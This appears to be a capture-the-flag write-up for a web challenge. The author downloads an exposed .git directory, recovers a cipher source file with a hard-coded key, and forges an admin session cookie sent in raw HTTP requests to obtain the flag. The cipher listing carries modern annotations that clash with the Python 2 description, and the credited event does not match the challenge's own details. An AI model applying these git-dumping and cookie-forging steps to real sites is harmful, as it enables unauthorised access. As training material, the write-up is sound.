# ▼▼▼Useless - 89pts (Misc:42/170=24.7%)▼▼▼  
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**

`http://13.124.66.179`

\---

**1.Understanding of the function**

・Create Account

・Login

\---

**2.Information Gathering**

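A request to `/.git/` returns a 403 response: the directory exists and only its listing is blocked, so individual files under it may still be downloadable.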

↓

```  
# perl rip-git.pl -v -u http://13.124.66.179/.git  
[i] Downloading git files from http://13.124.66.179/.git  
[i] Auto-detecting 404 as 200 with 3 requests  
[i] Getting correct 404 responses  
[i] Using session name: bjFqLEJf  
[d] found COMMIT_EDITMSG  
[d] found config  
[d] found description  
[d] found HEAD  
[d] found index  
[!] Not found for packed-refs: 404 Not Found  
[!] Not found for objects/info/alternates: 404 Not Found  
[!] Not found for info/grafts: 404 Not Found  
[d] found logs/HEAD  
[d] found objects/72/949062a18d1a23d392c87a1a6555cdddb83014  
[d] found objects/ab/117952cf9db060c337dcb90e782171377eab0b  
[d] found refs/heads/master  
[i] Running git fsck to check for missing items  
Checking object directories: 100% (256/256), done.  
[i] Got items with git fsck: 0, Items fetched: 0  
[!] No more items to fetch. That's it!  
Your branch is based on 'origin/master', but the upstream is gone.  
(use "git branch --unset-upstream" to fixup)  
```

↓

Get a file `readme.md`

\---

`# git log`

↓

```  
commit ab117952cf9db060c337dcb90e782171377eab0b (HEAD -> master)  
Author: joonuree <[email protected]>  
Date: Thu Feb 1 20:09:25 2018 +0900

useless

commit 72949062a18d1a23d392c87a1a6555cdddb83014  
Author: joonuree <[email protected]>  
Date: Thu Feb 1 20:07:26 2018 +0900  
```

↓

Let's roll back to the earlier commit 72949062a18d1a23d392c87a1a6555cdddb83014 to recover what the later "useless" commit removed.

↓

`# git reset --hard 72949062a18d1a23d392c87a1a6555cdddb83014`  
  
↓

Get `readme.md` and ` enc.py`

\---

`readme.md`

↓

```  
## algorithm for session cookie

### Basic  
\- general user >> username + user IP  
\- **admin** >> admin + 127.0.0.1

### example  
\- username : `codegate`, IP : `211.224.255.84`  
\- `codegate211.224.255.84` >> (encrypt) >> setting cookie  
```

↓

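According to the readme, the session cookie is just the encryption of username + IP, so if I can produce the cookie for `admin` + `127.0.0.1`, I will be logged in as admin and get a flag.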

\---

` enc.py`

↓

```  
#-*- coding: utf-8 -*-

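class Encrypt():
    """Home-made 8-byte block transform that derives the session cookie.

    The listing is Python 2 code; this version keeps the same results but
    uses ``//`` and explicit hex formatting so it also runs on Python 3.

    Security notes, all taken from what this class itself shows:

    * The default key and IV are string literals in the source, so anyone
      who can read the file can compute the cookie for any input string.
      Key material belongs in configuration or a secret store, never in
      the repository.
    * The output is deterministic and carries no integrity tag, so a
      verifier cannot tell a value issued by the server from one computed
      elsewhere with the same key.
    * ``encblock`` only reads round entries of the form
      ``p_chunk[i] ^ k_chunk[i]``; the arithmetic entries of ``round0`` to
      ``round7`` never reach the output.  In even-numbered blocks the chunk
      bytes cancel in output bytes 1 and 3, which therefore depend on the
      key alone.
    """

    def __init__(self, iv=None, keystr=None):
        """Store the IV and key and build the 8x8 key matrix.

        The original constructor accepted ``iv`` and ``keystr`` but ignored
        them.  They are honoured now; when omitted, the original literals
        are used so ``Encrypt()`` behaves exactly as before.

        Raises:
            ValueError: if ``iv`` has fewer than 8 characters or ``keystr``
                has fewer than 16.
        """
        # Published challenge values, kept only as backward-compatible
        # defaults -- they are not secrets.
        self.iv = "useles5@" if iv is None else iv
        self.keystr = "SUCK_7h15+4lG0_!" if keystr is None else keystr

        if len(self.iv) < 8:
            raise ValueError("iv must be at least 8 characters")
        if len(self.keystr) < 16:
            raise ValueError("keystr must be at least 16 characters")

        left = self.keystr[0:8]
        right = self.keystr[8:16]
        # init_matrix[i][j] = left[i] XOR right[j]
        self.init_matrix = [[ord(a) ^ ord(b) for b in right] for a in left]

    def split(self, p_txt):
        """Pad ``p_txt`` with "x" to a multiple of 8 and cut it into 8-character pieces."""
        remainder = len(p_txt) % 8
        if remainder != 0:
            p_txt += "x" * (8 - remainder)
        return [p_txt[i:i + 8] for i in range(0, len(p_txt), 8)]

    def change(self, p_txt):
        """Return ``p_txt`` as a list of 8-integer lists (``ord`` of each character)."""
        return [[ord(piece[j]) for j in range(8)] for piece in self.split(p_txt)]

    def schedule(self, num):
        """Return the key matrix with each row rotated by a fixed per-row amount.

        Even ``num`` reads column ``(8 - shift[i] + j) % 8``; odd ``num``
        reads column ``(shift[i] + j) % 8``.
        """
        shift = [1, 2, 3, 2, 2, 1, 2, 3]
        matrix = []
        for i in range(8):
            if num % 2 == 0:
                offset = 8 - shift[i]
            else:
                offset = shift[i]
            matrix.append([self.init_matrix[i][(offset + j) % 8] for j in range(8)])
        return matrix

    # round0..round7 each combine one 8-integer chunk with one key row.
    # ``//`` is the integer division the Python 2 ``/`` performed on ints.

    def round0(self, p_chunk, k_chunk):
        """Return the eight round-0 values for ``p_chunk`` and key row ``k_chunk``."""
        p, k = p_chunk, k_chunk
        return [
            p[0] - 10 + k[0],
            p[1] ^ k[1],
            p[2] + k[2],
            p[3] % (k[3] + 2) + 32,
            p[4] * 2 - k[3] - 7,
            p[5] - 11 - k[5] % 13,
            p[6] ^ k[6],
            p[7] * 5 // (k[7] + 5),
        ]

    def round1(self, p_chunk, k_chunk):
        """Return the eight round-1 values for ``p_chunk`` and key row ``k_chunk``."""
        p, k = p_chunk, k_chunk
        return [
            p[0] - 11 + k[0],
            p[1] ^ (k[1]) % 5,
            p[2] ^ k[2],
            p[3] % (k[3] + 2) + 34,
            p[4] - k[3] + 14,
            p[5] ^ k[5],
            p[6] + 9 - k[6],
            p[7] + k[7],
        ]

    def round2(self, p_chunk, k_chunk):
        """Return the eight round-2 values for ``p_chunk`` and key row ``k_chunk``."""
        p, k = p_chunk, k_chunk
        return [
            p[0] - 11 + k[0],
            p[1] ^ (k[1]) % 13,
            p[2] + k[2] + 17,
            p[3] ^ k[3],
            p[4] ^ k[4],
            p[5] - k[5] + 20,
            p[6] // 3 % (k[6] + 15),
            p[7] + k[7],
        ]

    def round3(self, p_chunk, k_chunk):
        """Return the eight round-3 values for ``p_chunk`` and key row ``k_chunk``."""
        p, k = p_chunk, k_chunk
        return [
            p[0] + k[0],
            p[1] ^ k[1] - 15,
            p[2] ^ k[2],
            p[3] + k[3],
            p[4] + k[3] - 33,
            p[5] ^ k[5],
            p[6] + k[6] - 55,
            p[7] + k[7],
        ]

    def round4(self, p_chunk, k_chunk):
        """Return the eight round-4 values for ``p_chunk`` and key row ``k_chunk``."""
        p, k = p_chunk, k_chunk
        return [
            p[0] + k[0],
            p[1] + k[1] + 17,
            p[2] ^ k[2],
            p[3] - k[3] + 20,
            p[4] % (k[3] + 2) - 34,
            p[5] ^ k[5],
            p[6] + k[6],
            p[7] - 11 + k[7],
        ]

    def round5(self, p_chunk, k_chunk):
        """Return the eight round-5 values for ``p_chunk`` and key row ``k_chunk``."""
        p, k = p_chunk, k_chunk
        return [
            p[0] // 6 % (k[0] + 1),
            p[1] ^ k[1],
            p[2] - k[2] + 20,
            p[3] - k[3] + 20,
            p[4] % (k[3] + 7) - 34,
            p[5] + k[5],
            p[6] ^ k[6],
            p[7] + k[7],
        ]

    def round6(self, p_chunk, k_chunk):
        """Return the eight round-6 values for ``p_chunk`` and key row ``k_chunk``."""
        p, k = p_chunk, k_chunk
        return [
            p[0] // 6 % (k[0] + 7),
            p[1] + k[1],
            p[2] ^ k[2],
            p[3] - k[3] % 2 + 55,
            p[4] % (k[3] + 3) + 127,
            p[5] ^ k[5],
            p[6] + k[6] % 3,
            p[7] + 11 + k[7],
        ]

    def round7(self, p_chunk, k_chunk):
        """Return the eight round-7 values for ``p_chunk`` and key row ``k_chunk``."""
        p, k = p_chunk, k_chunk
        return [
            p[0] + k[0] % 30,
            p[1] // (k[1] + 1),
            p[2] % (k[2] + 4) + 18,
            p[3] ^ k[3],
            p[4] ^ k[4],
            p[5] // (k[5] + 10) + 97,
            p[6] + k[6],
            p[7] // 11 + k[7],
        ]

    def xor_calc(self, iv, chunk):
        """Return the element-wise XOR of two 8-integer lists."""
        return [iv[i] ^ chunk[i] for i in range(8)]

    def encblock(self, chunk, num):
        """Transform one 8-integer chunk; ``num`` is the block index.

        One value is taken from each round's output (the column depends on
        the parity of ``num``) and three of them are XORed into each chunk
        byte.  Every selected column is an XOR entry of its round function.
        """
        rows = self.schedule(num)
        rounds = (self.round0, self.round1, self.round2, self.round3,
                  self.round4, self.round5, self.round6, self.round7)
        block = [rounds[r](chunk, rows[r]) for r in range(8)]

        # Column read from round r's output, for even and odd block indexes.
        if num % 2 == 0:
            cols = (1, 2, 3, 2, 2, 1, 2, 3)
        else:
            cols = (6, 5, 4, 5, 5, 6, 5, 4)
        a, b, c, d, e, f, g, h = [block[r][cols[r]] for r in range(8)]

        return [
            chunk[0] ^ a ^ b ^ c,
            chunk[1] ^ a ^ b ^ d,
            chunk[2] ^ a ^ c ^ d,
            chunk[3] ^ b ^ c ^ d,
            chunk[4] ^ e ^ f ^ g,
            chunk[5] ^ e ^ f ^ h,
            chunk[6] ^ e ^ g ^ h,
            chunk[7] ^ f ^ g ^ h,
        ]

    def encrypt(self, plaintxt):
        """Return the lowercase hex string of the transformed ``plaintxt``.

        Each chunk is XORed with the previous output block (the IV for the
        first chunk) before ``encblock`` runs.

        Raises:
            ValueError: if an output value does not fit in one byte; the
                original raised the same error from ``chr()``.
        """
        previous = self.change(self.iv)[0]
        e_chunks = []
        for index, p_chunk in enumerate(self.change(plaintxt)):
            mixed = self.xor_calc(previous, p_chunk)
            previous = self.encblock(mixed, index)
            e_chunks.append(previous)

        hex_parts = []
        for e_chunk in e_chunks:
            for value in e_chunk:
                if not 0 <= value <= 255:
                    raise ValueError("chr() arg not in range(256)")
                # Replaces the Python-2-only str.encode('hex').
                hex_parts.append("%02x" % value)
        return "".join(hex_parts)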
```

↓

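It is an `Encrypt` class written in Python (Python 2: it relies on integer `/` and `str.encode('hex')`). The key and IV are hard-coded in the constructor, so the source alone is enough to compute any session cookie.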

\---

At the end of enc.py, I wrote the following code.

↓

```  
# Session value the readme describes for admin: "admin" + "127.0.0.1".
cipher = Encrypt()
print(cipher.encrypt('admin127.0.0.1'))
```

↓

```  
# python enc.py  
7e787c68293431367f6d63236f36694a  
```

↓

Get a useless_session_id of admin!!

\---

```  
GET / HTTP/1.1  
Host: 13.124.66.179  
Cookie: useless_session_id=7e787c68293431367f6d63236f36694a  
```

↓ Response

```  

* admin
  

* flag
  
```

↓

```  
GET /flag_6c98a6487611dd8d3adfa25d7f41cfed HTTP/1.1  
Host: 13.124.66.179  
Cookie: useless_session_id=7e787c68293431367f6d63236f36694a  
```

↓

```  
<div class="jumbo">  
<h2>FLAG</h2>  
<h4>Suck Algorithm! It has duplicated keys, So Useless :p</h4>  
<h4>Encrypt the below plain text in { } with key, and Auth IT!</h4>  
<h3>ENCRYPTME{It's_reaLLy_n0nsen5_th4t_I_5p3nt_M0ney_more_7h4n_My_6udg3t.}</h3>  
<h4>Thank you for solving, please enjoy other challenges! :)</h4>  
</div>  
```

↓

ENCRYPTME{It's_reaLLy_n0nsen5_th4t_I_5p3nt_M0ney_more_7h4n_My_6udg3t.}

\---

At the end of enc.py, I wrote the following code.

```  
# Encrypt the text inside ENCRYPTME{...} with the same built-in key and IV.
cipher = Encrypt()
print(cipher.encrypt("It's_reaLLy_n0nsen5_th4t_I_5p3nt_M0ney_more_7h4n_My_6udg3t."))
```

↓

```  
# python enc.py  
1678766808377c204d4a062d550c536f3d783868306d262550154b6129702f485378396821494c52171e695d4f16493c79783f681f4e1c411b045e0b227b2443  
```

↓

Get a flag!!

Original writeup (https://github.com/Super-Guesser/ctf/tree/master/Fword%20CTF%202020/writeups/useless).